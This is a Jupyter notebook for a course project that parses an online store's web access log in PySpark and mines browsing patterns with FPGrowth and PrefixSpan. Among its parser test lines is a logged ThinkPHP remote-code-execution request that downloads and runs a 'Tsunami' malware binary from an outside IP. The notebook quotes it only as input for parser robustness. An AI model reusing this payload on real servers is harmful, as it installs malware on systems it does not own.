# Project: Sequential Pattern Mining with a Web Log

In this project we will use Spark and the PrefixSpan algorithm to mine the web log of an online store.


Author: <font color="blue">Ian Liu</font>

E-mail: <font color="blue">Liuusa.tw@gmail.com</font>

Date: <font color="blue">April 10, 2023</font>

In [None]:
from pyspark.sql.functions import col
from pyspark.mllib.fpm import FPGrowth
from pyspark import SparkContext
import re
from datetime import datetime
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
from pyspark.ml.fpm import PrefixSpan

## About Data and Cleaning

**Dataset**: https://dataverse.harvard.edu/dataset.xhtml?persistentId=doi:10.7910/DVN/3QBYB5

- The link above describes the dataset. You can download the data from https://cis331.guihang.org/data/access.log.zip
- **Download and unzip** the file `access.log.zip`; move the file `access.log` to the directory that you map into the Docker instance:

For example, say I move my file into my home directory, `/Users/zhengqu`; then, in the Mac terminal or Windows command prompt, I `cd` to my home directory (on a Mac, typing `cd` alone and pressing Enter does this).

```bash
pwd
```

<font size=-1 color=grey>/Users/zhengqu</font>

Let's assume I put `access.log` in my home dir as `/Users/zhengqu/access.log` and my spark docker container/instance was created by the following command, as I demonstrated in the video after the spark lab lecture:

```bash
docker run -p 10000:8888 -d -P --name notebook -it  -v "$PWD:/home/jovyan/mydir" jupyter/all-spark-notebook
```

whereby `"$PWD"` is actually `/Users/zhengqu` in my case, and it is mapped into docker container `notebook` as `/home/jovyan/mydir`. So anything I put in this folder `"/Users/zhengqu"` on my host laptop is available in my spark docker container `notebook` in this folder: `/home/jovyan/mydir`.



### Access the data file from docker container

- First, start the Spark Docker container (you can skip this if the container has not been stopped since you last ran it).

Use this command to show the status of your Docker containers:

```bash
docker ps -a
```

- To start the container:

```bash
docker start notebook
```

- Next, connect to the container with bash:

```bash
# connect to docker container with bash
docker exec -it notebook /bin/bash
```

- Now you are inside the spark docker container (imagine it as a virtual linux machine).

----
**Note: commands below are run from docker container linux system**


- Let's "cd" to the mapped folder:

```bash
# change to mapped dir:
cd /home/jovyan/mydir
```


- Let's check the file by running:

```bash
 ls -l access.log
```
<font size=-2 color=grey>`-rw-r--r--@ 1 jovyan  staff 3502440823 Jan 26  2019 access.log`</font>

- Let's check how many lines it has by running (this takes a while):

```bash
wc -l access.log
```
<font size=-2 color=grey>`10365152 access.log`</font>

- Let's print the last 100 lines of the file:

```bash
tail -n 100 access.log
```



<font size=-2 color=#524d43>

```
151.239.2.90 - - [26/Jan/2019:20:29:09 +0330] "GET /static/bundle-bundle_site_head.css HTTP/1.1" 499 0 "https://www.zanbil.ir/search/%D8%B3%D8%B1%D8%B1%D8%B3%DB%8C%D8%AF/p0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" "-"
151.239.2.90 - - [26/Jan/2019:20:29:09 +0330] "GET /image/%7B%7BbasketItem.id%7D%7D?type=productModel&wh=50x50 HTTP/1.1" 200 5 "https://www.zanbil.ir/search/%D8%B3%D8%B1%D8%B1%D8%B3%DB%8C%D8%AF/p0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" "-"
5.114.175.169 - - [26/Jan/2019:20:29:09 +0330] "GET /image/56602/productModel/200x200 HTTP/1.1" 200 6188 "https://www.zanbil.ir/m/filter/b2%2Cp65%2Ct31" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-"
5.114.175.169 - - [26/Jan/2019:20:29:09 +0330] "GET /image/62175/productModel/200x200 HTTP/1.1" 200 8140 "https://www.zanbil.ir/m/filter/b2%2Cp65%2Ct31" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-"
5.114.175.169 - - [26/Jan/2019:20:29:09 +0330] "GET /image/62064/productModel/200x200 HTTP/1.1" 200 6840 "https://www.zanbil.ir/m/filter/b2%2Cp65%2Ct31" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-"
151.239.2.90 - - [26/Jan/2019:20:29:09 +0330] "GET /static/images/search-category-arrow.png HTTP/1.1" 200 217 "https://znbl.ir/static/bundle-bundle_site_head.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" "-"
[truncated]
```
</font>

---

## Understand the Web Log Format

Read [this article](https://www.sumologic.com/blog/apache-access-log/) to understand the web log format. Each web site may use a slightly different format. In general, each line starts with the user's IP, followed by the timestamp (inside `[ ]` in the case above) and the user's request (in simplified terms, sending data, such as a login password, is a `POST`; retrieving data is a `GET`). The request URL does not contain the base domain name. So

```
GET /image/62175/productModel/200x200
```

means retrieving https://www.zanbil.ir/image/62175/productModel/200x200
(the base domain name of this web log is www.zanbil.ir)
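To make this mapping concrete, here is a minimal sketch that rebuilds the full URL from a logged request path with Python's standard `urllib.parse.urljoin`. The base URL `https://www.zanbil.ir` comes from the text above; the helper name `full_url` is only illustrative.

```python
from urllib.parse import urljoin

# Base domain of this web log, as stated above
BASE = "https://www.zanbil.ir"

def full_url(request_path: str) -> str:
    """Join a logged request path such as '/image/...' onto the site's base URL."""
    return urljoin(BASE, request_path)

print(full_url("/image/62175/productModel/200x200"))
# https://www.zanbil.ir/image/62175/productModel/200x200
```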

The three-digit number after `HTTP/1.1` is the response status: 200 means success; 3xx codes are redirections (for example, 302 sends the browser to another URL, and 304 means the data has not changed since the user last requested it, so the browser can serve it from its cache, i.e. data saved in the user's browser); 4xx means a client (user browser) error (404 Not Found is the infamous one); 5xx means a server error. <font color="orange">So you only care about 200 and 3xx statuses, and want to filter out lines with any other status.</font>
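A minimal sketch of this status rule as a plain Python predicate, which you could apply to the `STATUS` field of each parsed record (the name `keep_status` is hypothetical):

```python
def keep_status(status: int) -> bool:
    """Keep 200 (OK) and any 3xx status; drop everything else."""
    return status == 200 or 300 <= status <= 399

# Statuses that appear in the sample log lines above
for s in (200, 302, 404, 499):
    print(s, keep_status(s))
```

On a Spark DataFrame, the same condition could be written on a column, for example `(F.col("status") == 200) | F.col("status").between(300, 399)`, assuming the column is named `status`.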

You will see the same IP, at a single timestamp, requesting many URLs at once. That's because when you open a page, the images, CSS, and JavaScript files within that page are each retrieved separately, and each request leaves its own web log entry.


<font color="orange">Remember that before mining further, you will filter out all lines requesting CSS or JS files (you need to work out the URL patterns for these yourself), since they are normally useless for our purpose.</font>
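Working out the exact patterns is part of the exercise; as one hypothetical starting point, a regular expression can flag request URLs whose path ends in `.css` or `.js`, optionally followed by a query string. The pattern and the name `is_static_asset` are assumptions to check against the actual log, not a definitive rule.

```python
import re

# Hypothetical pattern: ".css" or ".js" at the end of the URL,
# or directly before a query string ("?...")
STATIC_ASSET = re.compile(r"\.(?:css|js)(?:\?|$)", re.IGNORECASE)

def is_static_asset(url: str) -> bool:
    """True if the request URL looks like a CSS or JavaScript file."""
    return STATIC_ASSET.search(url) is not None

print(is_static_asset("/static/bundle-bundle_site_head.css"))  # True
print(is_static_asset("/image/62175/productModel/200x200"))    # False
```

Anchoring on `?` or end-of-string keeps paths such as `/data.json` from matching merely because they contain `.js`.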

You will also notice that some log entries contain lines like this:

<font size=-2 color=#888>
```
37.129.59.160 - - [26/Jan/2019:20:29:12 +0330] "GET /basket/add/62424?mobile=1&addedValues= HTTP/1.1" 302 0 "https://www-zanbil-ir.cdn.ampproject.org/v/s/www.zanbil.ir/m/product/32148/%DA%AF%D9%88%D8%B4%DB%8C-%D8%AA%D9%84%D9%81%D9%86-%D8%A8%DB%8C-%D8%B3%DB%8C%D9%85-%D9%BE%D8%A7%D9%86%D8%A7%D8%B3%D9%88%D9%86%DB%8C%DA%A9-%D9%85%D8%AF%D9%84-Panasonic-Cordless-Telephone-KX-TGC412?amp_js_v=0.1&usqp=mq331AQECAEoAQ%3D%3D" "Mozilla/5.0 (Linux; Android 6.0.1; D6633 Build/23.5.A.1.291) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36" "-"
```
</font>

- Note: <font color="orange">this URL `/basket/add/62424` means the user's action to add a product to the basket!</font>
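A hypothetical helper for spotting this action on the parsed `REQUEST_URL`, assuming every add-to-basket request starts with the `/basket/add/` prefix seen in the entry above (worth confirming against your own data):

```python
# Hypothetical prefix, taken from the example log entry above
BASKET_ADD_PREFIX = "/basket/add/"

def is_basket_add(url: str) -> bool:
    """True if the request URL is an add-to-basket action."""
    return url.startswith(BASKET_ADD_PREFIX)

print(is_basket_add("/basket/add/62424?mobile=1&addedValues="))  # True
print(is_basket_add("/m/product/32148"))                          # False
```

Note that the example entry above has status 302, so it survives the 200/3xx status filter. On a DataFrame, `F.col("url").startswith("/basket/add/")` expresses the same test, assuming a column named `url`.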


In [None]:
!ls -l access.log

-rwxrwxrwx 1 jovyan 1000 3502440823 Mar 27 19:11 access.log


In [None]:
!wc -l access.log

10365152 access.log


In [None]:
!tail -n 50 access.log

5.213.7.50 - - [26/Jan/2019:20:29:11 +0330] "GET /product/18962/%D8%BA%D8%B0%D8%A7-%D8%B3%D8%A7%D8%B2-%D9%85%D9%88%D9%84%DB%8C%D9%86%DA%A9%D8%B3-%D9%85%D8%AF%D9%84-FP7367RT HTTP/1.1" 302 0 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" "-"
180.94.84.225 - - [26/Jan/2019:20:29:11 +0330] "GET /amp-helper-frame.html?appId=a624a1c1-0c93-466a-a546-e146710f97e6&parentOrigin=https://www.zanbil.ir HTTP/1.1" 200 133 "https://www.zanbil.ir/m/article/616/%D8%B9%D9%84%D8%AA-%D8%AE%D9%88%D8%A7%D8%A8-%D8%B1%D9%81%D8%AA%D9%86%D8%8C%DA%AF%D8%B2%DA%AF%D8%B2%D8%8C%D8%A8%DB%8C-%D8%AD%D8%B3%DB%8C-%D9%88-%D9%85%D9%88%D8%B1-%D9%85%D9%88%D8%B1-%D8%B4%D8%AF%D9%86-%D8%A7%D9%86%DA%AF%D8%B4%D8%AA%D8%A7%D9%86-%D8%AF%D8%B3%D8%AA-%D9%88-%D8%AF%D8%B1%D9%85%D8%A7%D9%86-%D8%A2%D9%86" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-J330F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7

---

### Preprocess Tasks

To simplify our task, we will only consider users who have added at least one product to the basket. So the preprocessing steps are:

0. Read `access.log` into Spark`*`
1. Filter out all unnecessary lines, as highlighted in orange above.
2. Get a list of IPs (let's call it uniqueIPs) that performed the action of adding product(s) to the basket.
3. Filter out all records whose IP does not belong to the IP list from step 2.

The remaining records are what we will mine with PrefixSpan.
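Before moving to Spark, the logic of steps 1 to 3 can be sketched in plain Python on a handful of hypothetical, already-parsed records. The final grouping into one time-ordered URL sequence per IP is an assumption about how the remaining records might be arranged for sequential mining; the steps above do not specify it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Hypothetical parsed records: (IP, TIMESTAMP, REQUEST_URL, STATUS)
records = [
    ("1.1.1.1", datetime(2019, 1, 26, 20, 0, 0), "/m/product/100", 200),
    ("1.1.1.1", datetime(2019, 1, 26, 20, 0, 5), "/static/site.css", 200),
    ("1.1.1.1", datetime(2019, 1, 26, 20, 1, 0), "/basket/add/100", 302),
    ("2.2.2.2", datetime(2019, 1, 26, 20, 0, 1), "/m/product/200", 200),
    ("2.2.2.2", datetime(2019, 1, 26, 20, 0, 9), "/m/product/300", 404),
]

# Hypothetical CSS/JS pattern (see the filtering rules above)
STATIC_ASSET = re.compile(r"\.(?:css|js)(?:\?|$)", re.IGNORECASE)

def keep(rec):
    """Step 1: keep 200/3xx responses that are not CSS/JS requests."""
    _ip, _ts, url, status = rec
    ok_status = status == 200 or 300 <= status <= 399
    return ok_status and STATIC_ASSET.search(url) is None

# Step 1: drop unwanted lines
cleaned = [r for r in records if keep(r)]

# Step 2: IPs that added at least one product to the basket
basket_ips = {ip for ip, _ts, url, _status in cleaned if url.startswith("/basket/add/")}

# Step 3: keep only records from those IPs
# (a plain-Python set lookup; in Spark, use a join instead of .isin())
kept = [r for r in cleaned if r[0] in basket_ips]

# Assumed extra step: one time-ordered sequence of URLs per IP
sequences = defaultdict(list)
for ip, _ts, url, _status in sorted(kept, key=lambda r: (r[0], r[1])):
    sequences[ip].append(url)

print(dict(sequences))
# {'1.1.1.1': ['/m/product/100', '/basket/add/100']}
```

Spark's `pyspark.ml.fpm.PrefixSpan` expects each sequence as a list of itemsets (a list of lists), so each URL would typically be wrapped as `[url]` before mining.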

`*` For step 0 (reading a text file into Spark), follow the examples on this page (click the Python tab): https://spark.apache.org/docs/latest/mllib-frequent-pattern-mining.html


### Example on a notebook running from docker container

- Run this from the Docker container's Linux bash command line to show the Jupyter notebook tokens:

```
jupyter notebook list
```

<font size=-2 color=grey>

```
Currently running servers:
http://0.0.0.0:8888/?token=01e38a2234531e653d320df569dbc94173ebe89460cd57a :: /home/jovyan
```
</font>


In your laptop's browser, open this URL:
`http://127.0.0.1:10000/?token=01e38a2234531e653d320df569dbc94173ebe89460cd57a`

Note that you replace 8888 with 10000, the host port mapped to the container's port 8888 by `-p 10000:8888`. Then navigate to your mapped directory, which is `mydir` if you followed the commands above. Create a new notebook (File > New Notebook) and save it (File > Save Notebook). You will also see the new notebook in your laptop folder; in my case it's in `/Users/zhengqu`. This notebook runs in the Docker container, so do not open the same notebook simultaneously in Jupyter on the host laptop (Windows/Mac)! This creates conflicts.

#### Let's look at the PySpark example from https://spark.apache.org/docs/latest/mllib-frequent-pattern-mining.html


```python
from pyspark.mllib.fpm import FPGrowth
from pyspark import SparkContext
sc = SparkContext('local[*]')

# Note data is an object of RDD: pyspark.rdd.PipelinedRDD
data = sc.textFile("data/mllib/sample_fpgrowth.txt")
transactions = data.map(lambda line: line.strip().split(' '))
model = FPGrowth.train(transactions, minSupport=0.2, numPartitions=10)
result = model.freqItemsets().collect() ## << note .collect()
for fi in result:
    print(fi)
```

Please run this example. Note:
- You need to download `sample_fpgrowth.txt` from
https://github.com/apache/spark/raw/master/data/mllib/sample_fpgrowth.txt
and specify its path correctly in `sc.textFile()`. You can use `!wget URL-to-data` in the Jupyter notebook, then `!ls path/to/downloaded/file` to verify the file.
- Spark objects (RDDs or DataFrames) are not Python lists; to loop over their contents, first bring the results to the driver with `.collect()`, as in the example above, or with `.take(n)`, as demonstrated in class.

## <font color=red>Your code to run the sample_fpgrowth.txt example with FPGrowth here</font>

In [None]:
!wget https://github.com/apache/spark/raw/master/data/mllib/sample_fpgrowth.txt

--2023-03-30 19:20:25--  https://github.com/apache/spark/raw/master/data/mllib/sample_fpgrowth.txt
Resolving github.com (github.com)... 140.82.114.3, ::ffff:140.82.114.3
Connecting to github.com (github.com)|140.82.114.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/apache/spark/master/data/mllib/sample_fpgrowth.txt [following]
--2023-03-30 19:20:26--  https://raw.githubusercontent.com/apache/spark/master/data/mllib/sample_fpgrowth.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68 [text/plain]
Saving to: ‘sample_fpgrowth.txt’


2023-03-30 19:20:26 (1.17 MB/s) - ‘sample_fpgrowth.txt’ saved [68/68]



In [None]:
from pyspark.mllib.fpm import FPGrowth
from pyspark import SparkContext

sc = SparkContext('local[*]')
# sc.stop()

# Note data is an object of RDD: pyspark.rdd.PipelinedRDD
data = sc.textFile("sample_fpgrowth.txt")
transactions = data.map(lambda line: line.strip().split(' '))
model = FPGrowth.train(transactions, minSupport=0.2, numPartitions=10)
result = model.freqItemsets().collect() ## << note .collect()
for fi in result:
    print(fi)

Note:

- data is an object of RDD:
```python
type(data)
```
> <font size=-2>pyspark.rdd.PipelinedRDD</font>
- `sc.textFile()` takes the path to your input file. Use jupyter command `!ls path/to/access.log` to verify your file path. Or switch to docker container command line, using something like `ls /home/jovyan/mydir/access.log` to verify.
- `data.map()` takes a function to be applied to each line of the input text file. If you prefer not to use a lambda function, you can define a named function like:
```python
def myParser (line):
   return line.strip().split(' ')
```

And then you can use `data.map` like:
```python
transactions = data.map(myParser)
```

Please try it in the example. Also refer to the notebook "pyspark-ex.ipynb" used in my Docker/Spark video demo.


## <font color=red>Your code to run the sample_fpgrowth.txt example with myParser here</font>

In [None]:
sc.stop()
sc = SparkContext('local[*]')


# Note data is an object of RDD: pyspark.rdd.PipelinedRDD
data = sc.textFile("sample_fpgrowth.txt")

def myParser (line):
   return line.strip().split(' ')

transactions = data.map(myParser)
model = FPGrowth.train(transactions, minSupport=0.2, numPartitions=10)
result = model.freqItemsets().collect() ## << note .collect()
for fi in result:
    print(fi)

FreqItemset(items=['z'], freq=5)
FreqItemset(items=['x'], freq=4)
FreqItemset(items=['x', 'z'], freq=3)
FreqItemset(items=['y'], freq=3)
FreqItemset(items=['y', 'x'], freq=3)
FreqItemset(items=['y', 'x', 'z'], freq=3)
FreqItemset(items=['y', 'z'], freq=3)
FreqItemset(items=['r'], freq=3)
FreqItemset(items=['r', 'x'], freq=2)
FreqItemset(items=['r', 'z'], freq=2)
FreqItemset(items=['s'], freq=3)
FreqItemset(items=['s', 'y'], freq=2)
FreqItemset(items=['s', 'y', 'x'], freq=2)
FreqItemset(items=['s', 'y', 'x', 'z'], freq=2)
FreqItemset(items=['s', 'y', 'z'], freq=2)
FreqItemset(items=['s', 'x'], freq=3)
FreqItemset(items=['s', 'x', 'z'], freq=2)
FreqItemset(items=['s', 'z'], freq=2)
FreqItemset(items=['t'], freq=3)
FreqItemset(items=['t', 'y'], freq=3)
FreqItemset(items=['t', 'y', 'x'], freq=3)
FreqItemset(items=['t', 'y', 'x', 'z'], freq=3)
FreqItemset(items=['t', 'y', 'z'], freq=3)
FreqItemset(items=['t', 's'], freq=2)
FreqItemset(items=['t', 's', 'y'], freq=2)
FreqItemset(items=['t', '

## Read and parse data in spark

In this project, your function for `data.map()` (let's still call it `myParser`) should take a line (a string) and return a tuple of

`IP, TIMESTAMP, REQUEST_URL, STATUS`

- `IP` can be a string,
- `TIMESTAMP` should be a datetime object, refer to [this tutorial](https://stackabuse.com/converting-strings-to-datetime-in-python/) for converting string to datetime object. (note: timezone doesn't matter in this project because all records are in the same timezone, which is server time, so you can ignore it.)
- `REQUEST_URL` is a string
- `STATUS` is an integer (200, 302, etc.)
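As a point of comparison, a much shorter parser is possible if you assume every well-formed line follows the pattern in the samples above: IP, two placeholder fields, a bracketed timestamp, a quoted request, then the status. This sketch is an alternative to, not a reproduction of, the author's parser below; the names `LOG_RE` and `parse_line` are illustrative. It returns `None` for lines that don't match (such as the binary garbage requests found in the log), so in Spark you would follow `data.map(parse_line)` with `.filter(lambda r: r is not None)`.

```python
import re
from datetime import datetime

# Assumed line shape:
# IP - - [26/Jan/2019:20:29:09 +0330] "GET /path HTTP/1.1" 200 ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ '                     # IP, identity, user
    r'\[(?P<ts>[^\]]+)\] '                        # [timestamp +offset]
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" '    # "METHOD URL PROTOCOL"
    r'(?P<status>\d{3})'                          # three-digit status
)

def parse_line(line):
    """Return (IP, TIMESTAMP, REQUEST_URL, STATUS), or None if the line doesn't match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # Drop the "+0330" offset; all records share the server's timezone
    ts = datetime.strptime(m.group("ts").split()[0], "%d/%b/%Y:%H:%M:%S")
    return m.group("ip"), ts, m.group("url"), int(m.group("status"))

sample = ('5.114.175.169 - - [26/Jan/2019:20:29:09 +0330] '
          '"GET /image/62175/productModel/200x200 HTTP/1.1" 200 8140 "-" "-" "-"')
print(parse_line(sample))
```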


It's a good habit to test your function `myParser` first, on a smaller dataset and without Spark, before proceeding. You can create a 20-line file for this by running the following in the Docker container's Linux command line:
```bash
tail -n 20 access.log > small20.log
```

This creates the file `small20.log`.

You can view it by running the following command in the Docker container's Linux command line:
```bash
cat small20.log
```

Now you can test your parser on this file (note it sits inside `"/home/jovyan/mydir"`) with the following Python code in the Jupyter notebook:

```python
# Note this test doesn't involve spark
lines = open("/home/jovyan/mydir/small20.log").readlines()
for l in map(myParser, lines):
   print(l)
```




## <font color=red>Your code for defining the function `myParser` and testing it on small20.log without Spark (you can use the code above) here</font>

In [None]:
import re
from datetime import datetime
def myParser(line: str) -> tuple:
    """
    Take a line of string and return a tuple of (IP, TIMESTAMP, REQUEST_URL, STATUS)
    """
    #General Filter
    reg = r'\d+\.\d+\.\d+\.\d+[\s]+-[\s]+-[\s]+[\[][\s\S]+\+\d\d\d\d[\]][\s]+"[\s]*(GET|POST|HEAD|DELETE|PUT|CONNECT|OPTIONS|TRACE|PATCH)[\s]+.*[\s]*(HTTP)\/\d+\.\d+.*"\s+\d\d\d\s'
    reg_search = re.search(reg,line)
    if reg_search is not None:
        line = reg_search.group()
    else:
        #Some of the elements such as the request method may be missing
        line_list = line.split('"')
        if len(line_list) >= 3:
            line = line_list[0] + '"' + line_list[1] + '"' + line_list[2]

    #Find IP
    reg = r'\d+\.\d+\.\d+\.\d+[\s]-[\s]-[\s]\['
    reg_search = re.search(reg,line)
    if reg_search is not None:
        new_line = reg_search.group()
    else:
        print('ip', reg, line)
        new_line = line
    reg = r'[\s]-[\s]-[\s]'
    reg_search = re.search(reg,new_line)
    if reg_search is not None:
        ip_breaking_index = reg_search.start()
        ip = new_line[:ip_breaking_index]
    else:
        print(reg, new_line)
        if '- -' in new_line: ip = new_line.split('- -')[0].strip()
        else: ip = new_line.strip().split()[0]

    reg_search = re.search('(' + r"\.".join(ip.split('.'))+ ')', line)
    if reg_search is not None:
        timestamp = line[reg_search.end():]
    else:
        print('(' + r"\.".join(ip.split('.'))+ ')', line)
        if '- -' in line: timestamp = line.split('- -')[1].strip()
        else:
            temp_list = line.split()
            temp_list.pop(0)
            timestamp = " ".join(temp_list)

    if re.search(r'(GET|POST|HEAD|DELETE|PUT|CONNECT|OPTIONS|TRACE|PATCH)',timestamp) is not None:
        reg = r'[\[][\s\S]+\+\d\d\d\d[\]][\s]+"[\s]*(GET|POST|HEAD|DELETE|PUT|CONNECT|OPTIONS|TRACE|PATCH)'
    else:
        reg = r'[\[][\s\S]+\+\d\d\d\d[\]][\s]+"[\s]*'
    reg_search = re.search(reg,timestamp)
    if reg_search is None:
        print('timestamp',reg, timestamp)
        timestamp = timestamp
    else:
        timestamp = reg_search.group()

    reg = r'[\[][\s\S]+\+\d\d\d\d[\]][\s]+"[\s]*'
    reg_search = re.search(reg,timestamp)
    if reg_search is None:
        print('timestamp', reg, timestamp)
        timestamp = ""
    else:
        timestamp = reg_search.group()

    if timestamp is None: print("Couldn't find timestamp")
    else: timestamp = timestamp[:-1].strip()[1:-1]
    if '+' in timestamp:
        timestamp = timestamp.split('+')[0].strip()
    else: timestamp = timestamp.strip()

    timestamp = datetime.strptime(timestamp, "%d/%b/%Y:%H:%M:%S")

    if reg_search is None: print('timestamp',reg, line)
    else: reg_search = re.search(reg,line)
    request_url_index = reg_search.end()


    if re.search(r'(GET|POST|HEAD|DELETE|PUT|CONNECT|OPTIONS|TRACE|PATCH)',line) is not None and 'HTTP' in line:
        reg = r'(GET|POST|HEAD|DELETE|PUT|CONNECT|OPTIONS|TRACE|PATCH)[\s]+.*[\s]+(HTTP)\/\d+\.\d+.*"'
        reg_search = re.search(reg,line[request_url_index:])
        if reg_search is None: print("url problem, line: ", line[request_url_index:])

        request_url = reg_search.group()
        status_code_index = re.search(reg,line).end()
        request_url = request_url.strip()
        reg = r'(HTTP)\/\d+\.\d+.*"'  # raw string avoids invalid-escape warnings for \/ and \d
        reg_search = re.search(reg,request_url)
        if reg_search is None:
            print('remove HTTP/1.1', reg, request_url)
            request_url = request_url
        else:
            request_url = request_url[:reg_search.start()].strip() # Remove HTTP/1.1
            request_url = request_url.split()[-1] # Remove request method like POST and GET
    else:
        request_url = line[request_url_index:].split('"')[0]
        status_code_index = line.find(request_url)


    reg = r'\s+\d\d\d\s'
    status_code = line[status_code_index:]
    reg_search = re.search(reg, status_code)
    if reg_search is None:
        print('status_code', reg, status_code)
        print('line',line)
        status_code = 999
    else:
        status_code = reg_search.group()
        status_code = int(status_code.strip())


    return ip, timestamp, request_url, status_code

In [None]:
%store myParser

In [None]:
print(myParser(r'91.251.151.64 - - [26/Jan/2019:20:23:46 +0330] "GET /m/filter/b8%2Ct10%2Ct4 HTTP/1.1" 200 19669 "https://www.zanbil.ir/m/filter/b8%2Ct10" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-A520F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7.4 Chrome/59.0.3071.125 Mobile Safari/537.36" "-'))
print(myParser(r'74.82.60.74 - - [22/Jan/2019:08:27:26 +0330] "\x13BitTorrent protocol\x00\x00\x00\x00\x00\x18\x00\x05\x7FI\xE3\x1Ao\xC6\x13\x9D\xCE\xBB2\xBD(\x10w\xC8\x99\xC1\xC1\xCC-UW0I2M-QuIQ4GIjrmt2\x0F\x8A\x00\xAD\x96\x97\x96\xAB\x00\x22**\x13\x01\x13\x02\x13\x03\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x13\xC0\x14\x00\x9C\x00\x9D\x00/\x005\x00" 400 166 "-" "-" "-"'))
print(myParser(r'93.115.27.22 - - [22/Jan/2019:10:59:39 +0330] "CONNECT www.msftncsi.com:443 HTTP/1.1" 400 166'))
print(myParser(r'80.82.64.127 - - [22/Jan/2019:08:40:11 +0330] "\x16\x03\x01\x00\x96\x01\x00\x00\x92\x03\x03\xCB\x077\xE6\x83Nq>\xB5\xED\x9E\x87\xB7\x08\xD7\xEAF" 400 166'))
print(myParser(r'74.82.60.74 - - [22/Jan/2019:08:27:26 +0330] "\x13BitTorrent protocol\x00\x00\x00\x00\x00\x18\x00\x05\x7FI\xE3\x1Ao\xC6\x13\x9D\xCE\xBB2\xBD(\x10w\xC8\x99\xC1\xC1\xCC-UW0I2M-QuIQ4GIjrmt2\x0F\x8A\x00\xAD\x96\x97\x96\xAB\x00\x22**\x13\x01\x13\x02\x13\x03\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x13\xC0\x14\x00\x9C\x00\x9D\x00/\x005\x00" 400 166'))
print(myParser(r"""202.70.250.38 - - [24/Jan/2019:15:58:56 +0330] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1\x00" 400 166"""))
print(myParser(r'124.235.138.251 - admin [25/Jan/2019:21:28:21 +0330] "GET / HTTP/1.1" 301 178 '))

('91.251.151.64', datetime.datetime(2019, 1, 26, 20, 23, 46), '/m/filter/b8%2Ct10%2Ct4', 200)
('74.82.60.74', datetime.datetime(2019, 1, 22, 8, 27, 26), '\\x13BitTorrent protocol\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x05\\x7FI\\xE3\\x1Ao\\xC6\\x13\\x9D\\xCE\\xBB2\\xBD(\\x10w\\xC8\\x99\\xC1\\xC1\\xCC-UW0I2M-QuIQ4GIjrmt2\\x0F\\x8A\\x00\\xAD\\x96\\x97\\x96\\xAB\\x00\\x22**\\x13\\x01\\x13\\x02\\x13\\x03\\xC0+\\xC0/\\xC0,\\xC00\\xCC\\xA9\\xCC\\xA8\\xC0\\x13\\xC0\\x14\\x00\\x9C\\x00\\x9D\\x00/\\x005\\x00', 400)
('93.115.27.22', datetime.datetime(2019, 1, 22, 10, 59, 39), 'www.msftncsi.com:443', 400)
('80.82.64.127', datetime.datetime(2019, 1, 22, 8, 40, 11), '\\x16\\x03\\x01\\x00\\x96\\x01\\x00\\x00\\x92\\x03\\x03\\xCB\\x077\\xE6\\x83Nq>\\xB5\\xED\\x9E\\x87\\xB7\\x08\\xD7\\xEAF', 400)
('74.82.60.74', datetime.datetime(2019, 1, 22, 8, 27, 26), '\\x13BitTorrent protocol\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x05\\x7FI\\xE3\\x1Ao\\xC6\\x13\\x9D\\xCE\\xBB2\\xBD(\\x10w\\xC8\\x99\\xC1\\xC1\\xCC-UW0I2M-

In [None]:
!tail -n 20 access.log > small20.log
!tail -n 10000 access.log > med10000.log
!tail -n 50000 access.log > med50000.log
!head -n 100000 access.log > large100000.log
!head -n 1000000 access.log > large1000000.log

In [None]:
!cat small20.log

91.99.55.165 - - [26/Jan/2019:20:29:12 +0330] "GET /m/filter/p2597%2Cb231?page=1 HTTP/1.1" 200 18805 "https://www.zanbil.ir/m/filter/p2597%2Cb231" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36" "-"
